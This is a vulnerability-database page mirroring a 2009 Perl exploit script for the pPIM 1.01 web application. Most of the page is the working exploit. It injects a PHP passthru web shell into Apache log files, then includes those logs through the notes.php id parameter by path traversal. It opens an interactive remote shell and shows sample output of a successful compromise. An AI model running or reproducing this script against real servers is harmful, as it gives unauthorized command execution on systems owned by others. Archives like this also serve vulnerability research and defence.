Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

pPIM 1.01 Command Execution Exploit

🗓️ 23 Feb 2009 00:00:00Reported by JosSType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

pPIM 1.01 Remote Command Executio

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
####################################################################  
# pPIM 1.01 (notes.php id) Remote Command Execution Exploit  
# url: http://www.phlatline.org/docs/files/ppim.zip  
#  
# Author: Jose Luis Gongora Fernandez (a.k.a) JosS  
# mail: sys-project[at]hotmail[dot]com  
# site: http://www.hack0wn.com/  
# team: Spanish Hackers Team - [SHT]  
#  
# thanks for the base code: CWH Underground  
# but I changed many things and fix bugs.  
#  
# Hack0wn Security Project!!  
#  
# This was written for educational purpose. Use it at your own risk.  
# Author will be not responsible for any damage.  
#  
####################################################################  
# OUTPUT: (tested on localhost)  
#  
# Trying to Inject the Code...  
# Successfully injected in ../../../../../../../var/log/apache2/access.log  
#  
# [shell]:~$ id  
# uid=33(www-data) gid=33(www-data) groups=33(www-data)  
# [shell]:~$ uname -a  
# Linux h4x0rz 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux  
# [shell]:~$ exit  
# joss@h4x0rz:~/Desktop$  
  
  
use LWP::UserAgent;  
use IO::Socket;  
use LWP::Simple;  
  
  
@apache=(  
"../../../../../../../apache/logs/error.log",  
"../../../../../../../apache/logs/access.log",  
"../../../../../../../apache/logs/error.log",  
"../../../../../../../apache/logs/access.log",  
"../../../../../../../apache/logs/error.log",  
"../../../../../../../apache/logs/access.log",  
"../../../../../../../etc/httpd/logs/acces_log",  
"../../../../../../../etc/httpd/logs/acces.log",  
"../../../../../../../etc/httpd/logs/error_log",  
"../../../../../../../etc/httpd/logs/error.log",  
"../../../../../../../var/www/logs/access_log",  
"../../../../../../../var/www/logs/access.log",  
"../../../../../../../usr/local/apache/logs/access_log",  
"../../../../../../../usr/local/apache/logs/access.log",  
"../../../../../../../var/log/apache/access_log",  
"../../../../../../../var/log/apache2/access_log",  
"../../../../../../../var/log/apache/access.log",  
"../../../../../../../var/log/apache2/access.log",  
"../../../../../../../var/log/access_log",  
"../../../../../../../var/log/access.log",  
"../../../../../../../var/www/logs/error_log",  
"../../../../../../../var/www/logs/error.log",  
"../../../../../../../usr/local/apache/logs/error_log",  
"../../../../../../../usr/local/apache/logs/error.log",  
"../../../../../../../var/log/apache/error_log",  
"../../../../../../../var/log/apache2/error_log",  
"../../../../../../../var/log/apache/error.log",  
"../../../../../../../var/log/apache2/error.log",  
"../../../../../../../var/log/error_log",  
"../../../../../../../var/log/error.log",  
"../../../../../var/log/access_log",  
"../../../../../var/log/access_log"  
);  
  
system(($^O eq 'MSWin32') ? 'cls' : 'clear');  
  
print "#######################################################################\n";  
print "# pPIM 1.01 (notes.php id) Remote Command Execution Exploit | By JosS #\n";  
print "#######################################################################\n\n";  
  
  
if (!$ARGV[0])  
{  
print "Usage: perl exploit.pl [host]\n";  
print " perl exploit.pl localhost\n\n";  
exit;}  
  
$host=$ARGV[0];  
$path="/notes.php?mode=edit&id="; # change if it is necesary  
  
# if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;}  
  
print "\nTrying to Inject the Code...\n";  
$CODE="<? passthru(\$_GET[cmd]) ?>";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";  
print $socket "GET /images/"."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#" . "HTTP/1.1";  
print $socket "Host: ".$host."\r\n";  
print $socket "Connection: close\r\n\r\n";  
close($socket);  
  
if ( $host !~ /^http:/ ) {$host = "http://" . $host;}  
  
foreach $getlog(@apache)  
{  
chomp($getlog);   
$find= $host.$path.$getlog; # $find= $host.$path.$getlog."%00";  
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$req = HTTP::Request->new(GET => $find);  
$res = $xpl->request($req);  
$info = $res->content;  
if($info =~ /\#\#\%\$\$\%\#\#/) # change if it is necesary  
{print "Successfully injected in $getlog \n\n";$log=$getlog; last;}  
}  
  
print "[shell]:~\$ ";  
chomp( $cmd = <STDIN> );  
  
while($cmd !~ "exit") {   
$shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."%00&cmd=$cmd";  
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$req = HTTP::Request->new(GET => $shell);  
$res = $xpl->request($req);  
$info = $res->content;   
if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg)   
{print $1;}  
print "[shell]:~\$ ";  
chomp( $cmd = <STDIN> );   
}  
  
  
# __h0__  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Feb 2009 00:00Current
7.4High risk
Vulners AI Score7.4
ppim 1.01command executionremote exploitjose luis gongora fernandezlwp useragentio socketperl
28
.json
Report